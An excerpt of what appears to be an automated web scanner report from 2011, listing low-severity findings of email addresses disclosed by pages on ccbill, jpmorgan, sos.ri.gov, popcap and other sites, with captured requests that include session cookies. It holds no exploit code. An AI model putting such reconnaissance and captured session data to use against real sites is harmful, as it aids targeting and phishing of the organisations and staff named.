<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="mailto:apps@ccbill.com">apps@ccbill.com</a>
...[SNIP]...
<a href="mailto:clientsupport@ccbill.com">clientsupport@ccbill.com</a>
...[SNIP]...
<a href="mailto: techpubs@ccbill.com"><font size="2">techpubs@ccbill.com</font>
...[SNIP]...

19.10. http://apps.ccbill.com/tmp/cache/intelli.config.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/tmp/cache/intelli.config.js

Issue detail

The following email address was disclosed in the response:

markg@ccbill.com

Request

GET /tmp/cache/intelli.config.js HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.3.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:01:56 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 18:22:58 GMT
ETag: "7017ccb1-8128-4c058480"
Accept-Ranges: bytes
Content-Length: 33064
Content-Type: application/x-javascript

intelli.config = {"htaccessfile_0":"<IfModule mod_rewrite.c>\r\n# enable mod_rewrite\r\nRewriteEngine on\r\n\r\n","htaccessfile_1":"# SECTION 1\r\n# correct urls for yahoo bot\r\nRewriteCond %{REQUEST
...[SNIP]...
<\/p>\r\n","site_description":"","site_keywords":"","backup":"backup\/","admin":"admin\/","site_email":"markg@ccbill.com","bugs_email":"markg@ccbill.com","tmpl":"cleancss","admin_tmpl":"default","lang":"en","charset":"UTF-8","date_format":"%b %e, %Y","suffix":":: Powered by Cavecreek Hosting","title_breadcrumb":"0","language_switch":"0","mod_rewrite":
...[SNIP]...

19.11. http://apps.ccbill.com/tmp/cache/intelli.lang.en.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/tmp/cache/intelli.lang.en.js

Issue detail

The following email addresses were disclosed in the response:

apps@ccbill.com
clientsupport@ccbill.com
consumersupport@ccbill.com
techpubs@ccbill.com

Request

GET /tmp/cache/intelli.lang.en.js HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.3.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:01:55 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 18:22:58 GMT
ETag: "7017ccb3-af4a-4c058480"
Accept-Ranges: bytes
Content-Length: 44874
Content-Type: application/x-javascript
Content-Language: en
X-Pad: avoid browser bug

intelli.lang.en = {"login":"Login","interface_language":"Interface Language","password":"Password","forgot_password":"Forgot your password?","login_btn":"Login","invalid_username":"Invalid username.",
...[SNIP]...
<a href=\"mailto:apps@ccbill.com\">apps@ccbill.com<\/a>
...[SNIP]...
<a href=\"mailto:consumersupport@ccbill.com\">consumersupport@ccbill.com<\/a>
...[SNIP]...
<a href=\"mailto:apps@ccbill.com\">apps@ccbill.com<\/a>
...[SNIP]...
<a href=\"mailto:clientsupport@ccbill.com\">clientsupport@ccbill.com<\/a>
...[SNIP]...
<a href=\"mailto: techpubs@ccbill.com\"><font size=\"2\">techpubs@ccbill.com<\/font>
...[SNIP]...

19.12. http://blog.katango.com/osd.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.katango.com
Path:	/osd.xml

Issue detail

The following email address was disclosed in the response:

support@wordpress.com

Request

GET /osd.xml HTTP/1.1
Host: blog.katango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hiab=nnascar; __qca=P0-1347206192-1310503617547

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:00 GMT
Content-Type: application/xml
Connection: close
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://blog.katango.com/xmlrpc.php
Expires: Wed, 13 Jul 2011 09:18:29 +0000
Cache-Control: max-age=86400, public
X-nc: HIT ord 2
Content-Length: 1620

<?xml version="1.0" encoding="UTF-8" ?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortName>Katango Blog</ShortName
...[SNIP]...
<Contact>support@wordpress.com</Contact>
...[SNIP]...

19.13. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following email address was disclosed in the response:

4e1cb129@www.imiclk.com

Request

Response

19.14. http://ec.ox.popcap.com/popcap/js/jquery/plugins/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ec.ox.popcap.com
Path:	/popcap/js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /popcap/js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: ec.ox.popcap.com
Proxy-Connection: keep-alive
Referer: http://www.ox.popcap.com/delivery/afr.php?show=true&cb=53926843&zoneid=85&lcid=1033&ref=http://www.popcap.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; lv=1310503157; user_profile=003000000000000; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; __utmb=163442877; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Tue, 12 Jul 2011 20:39:28 GMT
ETag: "2f41b0-1096-4a2f2fd1a7ec0+gzip"
Last-Modified: Tue, 10 May 2011 21:53:39 GMT
Server: ECS (dca/532E)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

19.15. https://iblogin.jpmorgan.com/sso/action/federateLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/federateLogin

Issue detail

The following email address was disclosed in the response:

morganmarkets@jpmorgan.com

Request

GET /sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2findex.jsp%3fpageName%3dcountry_earea&msg=+&securityLevel=0&cs=67%2bwndJznEzJNkT9QmX2jX9JYMs%3d HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pajpm1-temp="Tue Jul 12 12:29:11 EDT 2011"; JSESSIONID=CE57AB5A9A7C046C70A540F049D96361; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:29:21 GMT
Server: Apache
Set-Cookie: pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16435

                   <SCRIPT type="text/javascript">
<!--
   var cookieEnabled=(navigator.cookieEnabled)? true : false
   //if not IE4+ nor NS6+
   if (typeof navigator.cooki
...[SNIP]...
<a href="mailto:morganmarkets@jpmorgan.com" class="bluelnk2">morganmarkets@jpmorgan.com</a>
...[SNIP]...
<a href="mailto:morganmarkets@jpmorgan.com">
...[SNIP]...

19.16. https://iblogin.jpmorgan.com/sso/action/federateLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/federateLogin

Issue detail

The following email address was disclosed in the response:

morcom-feedback@jpmorgan.com

Request

Response

19.17. https://iblogin.jpmorgan.com/sso/action/web_ForgotUsername previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/web_ForgotUsername

Issue detail

The following email address was disclosed in the response:

morganmarkets@jpmorgan.com

Request

Response

19.18. https://iblogin.jpmorgan.com/sso/action/web_GetForgotUsername previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/web_GetForgotUsername

Issue detail

The following email address was disclosed in the response:

morganmarkets@jpmorgan.com

Request

GET /sso/action/web_GetForgotUsername?customInfoIndex=3 HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pajpm1-temp="Tue Jul 12 12:29:11 EDT 2011"; JSESSIONID=CE57AB5A9A7C046C70A540F049D96361; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:29:37 GMT
Server: Apache
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="
...[SNIP]...
<a href="mailto:morganmarkets@jpmorgan.com" class="bluelnk2">morganmarkets@jpmorgan.com</a>
...[SNIP]...
<a href="mailto:morganmarkets@jpmorgan.com">
...[SNIP]...

19.19. https://iblogin.jpmorgan.com/sso/action/web_NeedHelp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/web_NeedHelp

Issue detail

The following email address was disclosed in the response:

morganmarkets@jpmorgan.com

Request

Response

19.20. http://ocsp.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ocsp.thawte.com
Path:	/

Issue detail

The following email address was disclosed in the response:

premium-server@thawte.com

Request

POST / HTTP/1.1
Host: ocsp.thawte.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

0q0o0M0K0I0 ..+........4.h~v.|...S@u..z...... c.8s...f.AvR.1.&.....R.j.sZ.S.t...3....0.0.. +.....0...0.. +.....0..

Response

HTTP/1.0 200 Ok
last-modified: Sun, 10 Jul 2011 21:37:59 GMT
expires: Sun, 17 Jul 2011 21:37:59 GMT
content-type: application/ocsp-response
content-transfer-encoding: binary
content-length: 1478
cache-control: max-age=447257, public, no-transform, must-revalidate
date: Tue, 12 Jul 2011 17:23:42 GMT
connection: close

0...
......0.... +.....0......0...0..k........0..1.0 ..U....ZA1.0...U....Western Cape1.0...U... Cape Town1.0...U.
..Thawte Consulting cc1(0&..U....Certification Services Division1-0+..U...$Thawte Premium Server OCSP Responder1(0&. *.H... ...premium-server@thawte.com..20110710213759Z0s0q0I0 ..+........4.h~v.|...S@u..z...... c.8s...f.AvR.1.&.....R.j.sZ.S.t...3......20110710213759Z....20110717213759Z0. *.H...........N......q..T.I.i..#..q.O[...r.,.X.{.6....?U..}L_.
...[SNIP]...

19.21. http://sos.ri.gov/business/acknowledgements/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sos.ri.gov
Path:	/business/acknowledgements/

Issue detail

The following email addresses were disclosed in the response:

corp_pin@sos.ri.gov
corporations@sos.ri.gov

Request

GET /business/acknowledgements/ HTTP/1.1
Host: sos.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=235654147.1285599634.1310518004.1310518004.1310518004.1; __utmb=235654147.4.10.1310518004; __utmc=235654147; __utmz=235654147.1310518004.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:02 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 17371
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta
...[SNIP]...
<a href="mailto:corporations@sos.ri.gov">
...[SNIP]...
<a href="mailto:corp_pin@sos.ri.gov">
...[SNIP]...

19.22. http://sos.ri.gov/business/filings/annualreports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sos.ri.gov
Path:	/business/filings/annualreports/

Issue detail

The following email address was disclosed in the response:

corporations@sos.ri.gov

Request

GET /business/filings/annualreports/ HTTP/1.1
Host: sos.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=235654147.1285599634.1310518004.1310518004.1310518004.1; __utmb=235654147.2.10.1310518004; __utmc=235654147; __utmz=235654147.1310518004.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:47:00 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 15127
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta
...[SNIP]...
<a href="mailto:corporations@sos.ri.gov">
...[SNIP]...

19.23. http://sos.ri.gov/business/filings/businessforms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sos.ri.gov
Path:	/business/filings/businessforms/

Issue detail

The following email address was disclosed in the response:

corporations@sos.ri.gov

Request

GET /business/filings/businessforms/ HTTP/1.1
Host: sos.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=235654147.1285599634.1310518004.1310518004.1310518004.1; __utmb=235654147.1.10.1310518004; __utmc=235654147; __utmz=235654147.1310518004.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:46:58 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 15114
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta
...[SNIP]...
<a href="mailto:corporations@sos.ri.gov">
...[SNIP]...

19.24. http://sos.ri.gov/elections/voters/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sos.ri.gov
Path:	/elections/voters/register/

Issue detail

The following email address was disclosed in the response:

elections@sos.ri.gov

Request

GET /elections/voters/register/ HTTP/1.1
Host: sos.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=235654147.1285599634.1310518004.1310518004.1310518004.1; __utmb=235654147.3.10.1310518004; __utmc=235654147; __utmz=235654147.1310518004.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:47:05 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 19865
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta
...[SNIP]...
<a href="mailto:elections@sos.ri.gov">
...[SNIP]...

19.25. https://store.popcap.com/js/jquery/plugins/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: store.popcap.com
Connection: keep-alive
Referer: https://store.popcap.com/passport_login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; s_cc=true; __utmb=163442877; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DGame%252520List%2526pidt%253D1%2526oid%253Dhttp%25253A//www.popcap.com/%2526ot%253DA; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; lv=1310503202; user_profile=003000000000000

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:05 GMT
Server: Apache
Last-Modified: Wed, 11 Feb 2009 23:46:57 GMT
ETag: "6cccda-1096-49936371"
Accept-Ranges: bytes
Content-Length: 4246
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

19.26. https://support.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/

Issue detail

The following email address was disclosed in the response:

consumersupport@ccbill.com

Request

Response

19.27. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/SecurityBlanket/SecurityBlanket-FAQ.html

Issue detail

The following email addresses were disclosed in the response:

Blanket@TrustedCS.com
SecurityBlanket@TrustedCS.com
securityblanket@TrustedCS.com
securityblanket@trustedCS.com
tcssbsales@trustedcs.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:25 GMT
Server: Apache
Last-Modified: Thu, 09 Jun 2011 16:41:03 GMT
ETag: "3c541b-40c7-4df0f79f"
Accept-Ranges: bytes
Content-Length: 16583
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto:tcssbsales@trustedcs.com?Subject=Security Blanket Sales Information" target="_parent" onclick="window.event.cancelBubble=true;" style="font-size: 10px;" title="tcssbsales@trustedcs.com">
...[SNIP]...
<a href="mailto:securityblanket@trustedCS.com?Subject=Security Blanket Technical Support" target="_parent" onclick="window.event.cancelBubble=true;" style="font-size: 10px;" title="SecurityBlanket@TrustedCS.com">
...[SNIP]...
<a href="mailto:securityblanket@TrustedCS.com ?Subject=Reporting Security Blanket Questions or Issues">Security Blanket@TrustedCS.com</a>
...[SNIP]...

19.28. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/SecurityBlanket/SecurityBlanket.html

Issue detail

The following email addresses were disclosed in the response:

SecurityBlanket@TrustedCS.com
securityblanket@trustedCS.com
tcssbsales@trustedcs.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:20 GMT
Server: Apache
Last-Modified: Tue, 05 Jul 2011 20:02:38 GMT
ETag: "3c540d-48a6-4e136dde"
Accept-Ranges: bytes
Content-Length: 18598
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
